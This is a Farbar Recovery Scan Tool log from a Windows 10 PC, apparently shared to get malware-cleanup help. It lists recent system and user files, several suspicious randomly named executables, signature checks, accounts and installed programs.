2019-01-09 12:58 - 2019-01-01 14:45 - 000714752 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcli.dll
2019-01-09 12:58 - 2019-01-01 14:45 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcredprov.dll
2019-01-09 12:58 - 2019-01-01 14:20 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windowslivelogin.dll
2019-01-09 12:58 - 2019-01-01 14:18 - 000500736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll
2019-01-09 12:58 - 2019-01-01 14:17 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcredprov.dll
2019-01-09 12:58 - 2019-01-01 08:14 - 001063224 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2019-01-09 12:58 - 2019-01-01 08:14 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2019-01-09 12:58 - 2019-01-01 08:14 - 000076088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2019-01-09 12:58 - 2019-01-01 08:13 - 000709728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2019-01-09 12:58 - 2019-01-01 08:13 - 000436024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2019-01-09 12:58 - 2019-01-01 08:13 - 000170808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2019-01-09 12:58 - 2019-01-01 08:12 - 000713272 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2019-01-09 12:58 - 2019-01-01 08:12 - 000128824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2019-01-09 12:58 - 2019-01-01 08:12 - 000043536 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2019-01-09 12:58 - 2019-01-01 07:48 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserexport.exe
2019-01-09 12:58 - 2019-01-01 07:48 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wanarp.sys
2019-01-09 12:58 - 2019-01-01 07:48 - 000079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Print.Workflow.Source.dll
2019-01-09 12:58 - 2019-01-01 07:46 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MicrosoftAccountTokenProvider.dll
2019-01-09 12:58 - 2019-01-01 07:46 - 000154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2019-01-09 12:58 - 2019-01-01 07:46 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2019-01-09 12:58 - 2019-01-01 07:45 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore.dll
2019-01-09 12:58 - 2019-01-01 07:44 - 001708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSPhotography.dll
2019-01-09 12:58 - 2019-01-01 07:41 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2019-01-09 12:58 - 2019-01-01 07:41 - 000895488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2019-01-09 12:58 - 2019-01-01 07:37 - 000880048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2019-01-09 12:58 - 2019-01-01 07:37 - 000581808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVideoDSP.dll
2019-01-09 12:58 - 2019-01-01 07:37 - 000381240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2019-01-09 12:58 - 2019-01-01 07:17 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MicrosoftAccountTokenProvider.dll
2019-01-09 12:58 - 2019-01-01 07:16 - 001361408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSPhotography.dll
2019-01-09 12:58 - 2019-01-01 07:16 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2019-01-09 12:58 - 2019-01-01 07:15 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2019-01-09 12:58 - 2019-01-01 07:15 - 000317440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore.dll
2019-01-09 12:58 - 2019-01-01 07:14 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2019-01-09 12:58 - 2019-01-01 07:14 - 000330752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.Workflow.dll
2019-01-09 12:58 - 2019-01-01 07:13 - 000594432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2019-01-09 12:58 - 2019-01-01 07:13 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2019-01-09 12:58 - 2019-01-01 07:12 - 001036288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2019-01-09 12:58 - 2019-01-01 07:12 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2019-01-09 12:58 - 2019-01-01 07:12 - 000516608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidprov.dll
2019-01-09 12:58 - 2019-01-01 06:23 - 000001310 _____ C:\WINDOWS\system32\tcbres.wim
2019-01-09 11:06 - 2019-01-09 11:06 - 000031454 _____ C:\Users\ulol\Desktop\The Big Bang Theory - 12x11 - The Paintball Scattering.SVA.English.HI.C.orig.Addic7ed.com.srt
2019-01-07 22:58 - 2019-01-07 22:58 - 000076780 _____ C:\ProgramData\agent.update.1546898284.bdinstall.v2.bin
2019-01-07 21:28 - 2019-01-07 21:37 - 168596427 _____ C:\Users\ulol\Desktop\The.Big.Bang.Theory.S12E11.HDTV.x264-SVA[eztv].mkv
2019-01-07 20:50 - 2018-10-04 22:40 - 000359584 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\Gemma.sys
2019-01-07 20:47 - 2019-01-09 19:03 - 000000000 ____D C:\Program Files\Bitdefender Antivirus Free
2019-01-07 19:45 - 2019-01-11 14:41 - 000000000 ____D C:\ProgramData\Bitdefender
2019-01-07 19:45 - 2018-10-09 14:07 - 000294000 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\edrsensor.sys
2019-01-07 19:44 - 2018-08-22 11:43 - 000357768 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bddci.sys
2019-01-07 19:41 - 2019-01-07 19:41 - 000000000 ____D C:\Users\ulol\AppData\Roaming\QuickScan
2019-01-07 19:36 - 2019-01-07 19:36 - 000103988 _____ C:\ProgramData\agent.1546886203.bdinstall.v2.bin
2019-01-07 19:36 - 2019-01-07 19:36 - 000000000 ____D C:\ProgramData\Bitdefender Agent
2019-01-07 19:34 - 2019-01-07 19:34 - 000000085 _____ C:\WINDOWS\wininit.ini
2019-01-07 19:24 - 2019-01-07 20:33 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2019-01-07 19:24 - 2019-01-07 19:34 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2019-01-07 19:24 - 2019-01-07 19:24 - 000000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2019-01-02 20:51 - 2019-01-02 21:35 - 788517376 _____ C:\Users\ulol\Downloads\Skryta-identita-2006-DVDRip-cz-DABING.avi
2019-01-01 22:49 - 2019-01-01 23:30 - 734048256 _____ C:\Users\ulol\Downloads\Ja Robot - I, Robot (2004) cz dabing.avi
2018-12-25 12:28 - 2018-12-25 14:18 - 1998800896 _____ C:\Users\ulol\Downloads\The-Shining---Osvícení---horor-(1980)-cz.titulky-OD-SOUČKA-TOMÁŠE.avi
2018-12-25 12:22 - 2018-12-25 14:03 - 1109600935 _____ C:\Users\ulol\Downloads\Motýlek (Papillon) 1973(S.McQueen D.Hoffman) bombuj.mp4
2018-12-20 14:07 - 2018-12-14 08:25 - 001035256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2018-12-20 14:07 - 2018-12-14 07:55 - 003396608 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2018-12-20 14:07 - 2018-12-14 07:54 - 006032384 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2018-12-20 14:07 - 2018-12-14 07:52 - 001826816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2018-12-20 14:06 - 2018-12-14 08:29 - 001130760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2018-12-20 14:06 - 2018-12-14 08:21 - 001457240 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2018-12-20 14:06 - 2018-12-14 08:21 - 001257672 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2018-12-20 14:06 - 2018-12-14 08:21 - 001140480 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2018-12-20 14:06 - 2018-12-14 08:21 - 001098064 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2018-12-20 14:06 - 2018-12-14 08:21 - 000982912 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2018-12-20 14:06 - 2018-12-14 08:10 - 001295360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2018-12-20 14:06 - 2018-12-14 08:07 - 000669696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2018-12-20 14:06 - 2018-12-14 07:55 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2018-12-20 14:06 - 2018-12-14 07:54 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2018-12-20 14:06 - 2018-12-14 07:52 - 002173440 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2018-12-20 14:06 - 2018-12-14 07:51 - 001551360 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2018-12-20 14:06 - 2018-12-14 07:50 - 000776192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2018-12-13 19:20 - 2019-01-11 23:34 - 000730616 _____ C:\WINDOWS\system32\perfh007.dat
2018-12-13 19:20 - 2019-01-11 23:34 - 000149266 _____ C:\WINDOWS\system32\perfc007.dat
2018-12-13 19:20 - 2018-12-12 19:23 - 000306166 _____ C:\WINDOWS\system32\perfi007.dat
2018-12-13 19:20 - 2018-12-12 19:23 - 000040520 _____ C:\WINDOWS\system32\perfd007.dat
2018-12-13 19:14 - 2018-12-13 19:14 - 000000000 ____D C:\WINDOWS\SysWOW64\de
2018-12-13 19:14 - 2018-12-13 19:14 - 000000000 ____D C:\WINDOWS\system32\de

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-12 00:19 - 2018-04-11 22:04 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2019-01-12 00:18 - 2018-05-21 21:05 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-01-12 00:03 - 2018-04-12 00:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-01-12 00:02 - 2018-05-21 20:39 - 000000000 ____D C:\Users\ulol
2019-01-11 23:34 - 2018-05-21 20:39 - 002569078 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-01-11 23:34 - 2018-04-12 16:50 - 000716276 _____ C:\WINDOWS\system32\perfh005.dat
2019-01-11 23:34 - 2018-04-12 16:50 - 000144534 _____ C:\WINDOWS\system32\perfc005.dat
2019-01-11 23:34 - 2018-04-12 00:36 - 000000000 ____D C:\WINDOWS\INF
2019-01-11 23:13 - 2018-05-21 20:32 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-01-11 22:43 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\NDF
2019-01-11 18:07 - 2018-04-12 00:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-01-11 18:07 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-01-11 14:35 - 2017-12-19 23:57 - 000000000 ____D C:\Users\ulol\AppData\Local\Packages
2019-01-11 13:31 - 2017-02-01 18:08 - 000000000 ___HD C:\$SysReset
2019-01-11 12:32 - 2017-02-01 23:40 - 000000000 ____D C:\Users\ulol\.smplayer
2019-01-11 11:55 - 2017-02-13 11:53 - 000000000 ____D C:\Users\ulol\AppData\Roaming\vlc
2019-01-10 17:14 - 2017-10-18 10:44 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-01-09 19:09 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\TextInput
2019-01-09 19:09 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\bcastdvr
2019-01-09 18:25 - 2018-12-07 17:47 - 000000000 ____D C:\Users\ulol\Downloads\vikings s05
2019-01-09 13:11 - 2017-02-01 23:48 - 000000000 ____D C:\WINDOWS\system32\MRT
2019-01-09 13:08 - 2018-04-12 00:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-01-09 13:08 - 2017-02-01 23:48 - 132790320 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2019-01-03 18:04 - 2017-02-01 23:43 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2019-01-02 20:41 - 2018-11-15 17:52 - 000835480 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2019-01-02 20:41 - 2018-11-15 17:52 - 000179600 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2018-12-27 15:49 - 2018-11-21 19:19 - 000000000 ____D C:\Users\ulol\Downloads\Outlaw King (2018) 720p WEBRip x264 750MB (nItRo)-XpoZ
2018-12-25 12:15 - 2018-09-27 08:38 - 000000000 ____D C:\Users\ulol\Downloads\South.Park.S22
2018-12-23 15:52 - 2018-10-15 12:32 - 000000000 ____D C:\WINDOWS\Minidump
2018-12-22 09:09 - 2018-04-11 16:08 - 000000000 ____D C:\Users\ulol\AppData\Local\WiFi Guard
2018-12-21 10:17 - 2017-02-01 21:32 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2018-12-18 11:27 - 2017-02-01 21:40 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-12-15 12:56 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\en-GB
2018-12-15 12:56 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\en-GB
2018-12-13 20:15 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2018-12-13 20:06 - 2017-12-20 12:46 - 000000000 ___RD C:\Users\ulol\3D Objects
2018-12-13 20:06 - 2017-02-01 21:29 - 000000000 __RHD C:\Users\Public\AccountPictures
2018-12-13 19:20 - 2018-05-21 20:31 - 000401184 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2018-12-13 19:15 - 2018-04-12 16:51 - 000000000 ____D C:\WINDOWS\OCR
2018-12-13 19:14 - 2018-05-20 21:45 - 000000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\winrm
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\WCN
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\slmgr
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\Printing_Admin_Scripts
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\winrm
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\WCN
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\slmgr
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\Printing_Admin_Scripts
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\F12
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\dsc
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___RD C:\Program Files\Windows Defender
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\MUI
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\com
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\oobe
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\MUI
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\migwiz
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\com
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\IME
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\Help
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files\Common Files\system
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2018-12-13 19:14 - 2018-04-11 22:04 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2018-12-13 19:14 - 2018-04-11 22:04 - 000000000 ____D C:\WINDOWS\system32\Dism
2018-12-13 19:14 - 2018-04-11 22:04 - 000000000 ____D C:\WINDOWS\servicing
2018-12-13 19:13 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\ShellComponents
2018-12-13 12:03 - 2017-02-01 21:49 - 000000000 ____D C:\Users\ulol\Desktop\cool
2018-12-13 09:09 - 2018-05-22 10:32 - 000000000 ____D C:\Users\ulol\AppData\Local\PlaceholderTileLogoFolder

==================== Files in the root of some directories =======

2019-01-10 17:29 - 2019-01-10 17:29 - 000000004 _____ () C:\ProgramData\ext.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000004 _____ () C:\ProgramData\lock.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000008 _____ () C:\ProgramData\ts.dat
2017-09-26 07:46 - 2016-08-07 17:04 - 000000422 _____ () C:\Program Files (x86)\update-RiseTombRider.bat
2017-09-26 07:46 - 2013-10-13 06:47 - 000000732 _____ () C:\Program Files (x86)\visit-www.nosteam.ro.html
1601-01-03 21:26 - 1601-01-03 21:26 - 000060416 ____N (Microsoft Corporation) C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe
2019-01-11 11:20 - 2019-01-11 11:20 - 006161408 _____ () C:\Users\ulol\AppData\Local\dump007.dat
2017-08-29 16:47 - 2017-08-29 16:47 - 000008963 _____ () C:\Users\ulol\AppData\Local\recently-used.xbel
2019-01-11 23:01 - 2019-01-11 23:02 - 000007593 _____ () C:\Users\ulol\AppData\Local\Resmon.ResmonCfg
1601-01-03 21:26 - 1601-01-03 21:26 - 000178688 ____N (Microsoft Corporation) C:\Users\ulol\AppData\Local\UeaYTEArbi.exe
2019-01-10 17:29 - 2019-01-10 17:29 - 000000003 _____ () C:\Users\ulol\AppData\Local\wbem.ini

Some files in TEMP:
====================
2019-01-10 18:14 - 2019-01-12 00:06 - 000000000 ____D () C:\Users\ulol\AppData\Local\Temp\IE8Shims.dll
2019-01-10 17:29 - 2019-01-10 17:29 - 013205167 _____ (MAL ) C:\Users\ulol\AppData\Local\Temp\neyparstfp3.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-05-21 20:31

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28.09.2018
Ran by Martin (12-01-2019 00:03:25)
Running from C:\Users\ulol\Desktop
Windows 10 Home Version 1803 17134.523 (X64) (2018-05-21 20:07:15)
Boot Mode: Safe Mode (minimal)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-195099987-321758953-278711717-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-195099987-321758953-278711717-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-195099987-321758953-278711717-1000 - Limited - Disabled) => C:\Users\defaultuser0
Guest (S-1-5-21-195099987-321758953-278711717-501 - Limited - Disabled)
Martin (S-1-5-21-195099987-321758953-278711717-1001 - Administrator - Enabled) => C:\Users\ulol
WDAGUtilityAccount (S-1-5-21-195099987-321758953-278711717-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 19.010.20069 - Adobe Systems Incorporated)
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.7.320.8504 - BlueStack Systems, Inc.)
Catalyst Control Center Next Localization BR (HKLM\...\{585A6A74-1DED-8DA0-32F1-F5EFA485DFB1}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{2CEBB6AA-EC39-DFF2-1F5B-9A98301C4DAB}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{F05F0B6E-9999-55D0-C323-D06DF0E2B59F}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{CBABB5FD-BD69-8969-729A-5659E11D9518}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{98527BF3-A8E0-B8CF-7297-436B714FC576}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{D6CD1B25-53E6-C2F8-FA99-F89138A9C86F}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{487C3865-3005-F04A-FBA4-F4239E02A847}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{D80AD200-548C-B62B-32AE-BF3CD7AA7EA2}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{D21BFF5C-51AA-4C15-1C91-6A1087FDC373}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{A0649E20-C57C-DCFA-AE1B-1CE1CB9D98A8}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{35F79A5D-00E2-8C19-D929-2E85DEA4252D}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{04F0FFCB-D9A5-2332-2697-CA47C0424AF2}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{47F2FFDC-3D6A-CED6-0B54-6E7082D5B29B}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{5608D1B6-6483-9FA3-7297-C2CFC3FCE747}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{1FCA484A-5A9E-9C91-F050-257D1F311A0C}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{D8FB03AE-A326-0C12-AC47-B898FE73FA94}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{F7876D2E-CDCD-CE53-0E88-995B57A94B58}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{3BAB5AC8-EF35-FED0-BCEB-9306D05EDE1C}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{746E086C-023A-A79C-DBE1-062E773FF6C8}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{1C44BB26-1941-DB44-D5E8-C455F89EE6E6}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{BE7F26CB-6E91-7673-7130-80C36FBF13DE}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Common Desktop Agent (HKLM\...\{031A0E14-0413-4C97-9772-2639B782F46F}) (Version: 1.62.0 - OEM) Hidden
GIMP 2.8.22 (HKLM\...\GIMP-2_is1) (Version: 2.8.22 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
HiSuite (HKLM-x32\...\Hi Suite) (Version: 9.0.2.301 - Huawei Technologies Co.,Ltd)
HitmanPro 3.8 (HKLM\...\HitmanPro38) (Version: 3.8.0.295 - SurfRight B.V.)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4653 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: - )
Kingdom Come Deliverance (HKLM-x32\...\Kingdom Come Deliverance_is1) (Version: - )
Malwarebytes verze 3.6.1.2711 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.6.1.2711 - Malwarebytes)
Microsoft Office 365 ProPlus - cs-cz (HKLM\...\O365ProPlusRetail - cs-cz) (Version: 16.0.9126.2336 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-195099987-321758953-278711717-1001\...\OneDriveSetup.exe) (Version: 18.065.0329.0002 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
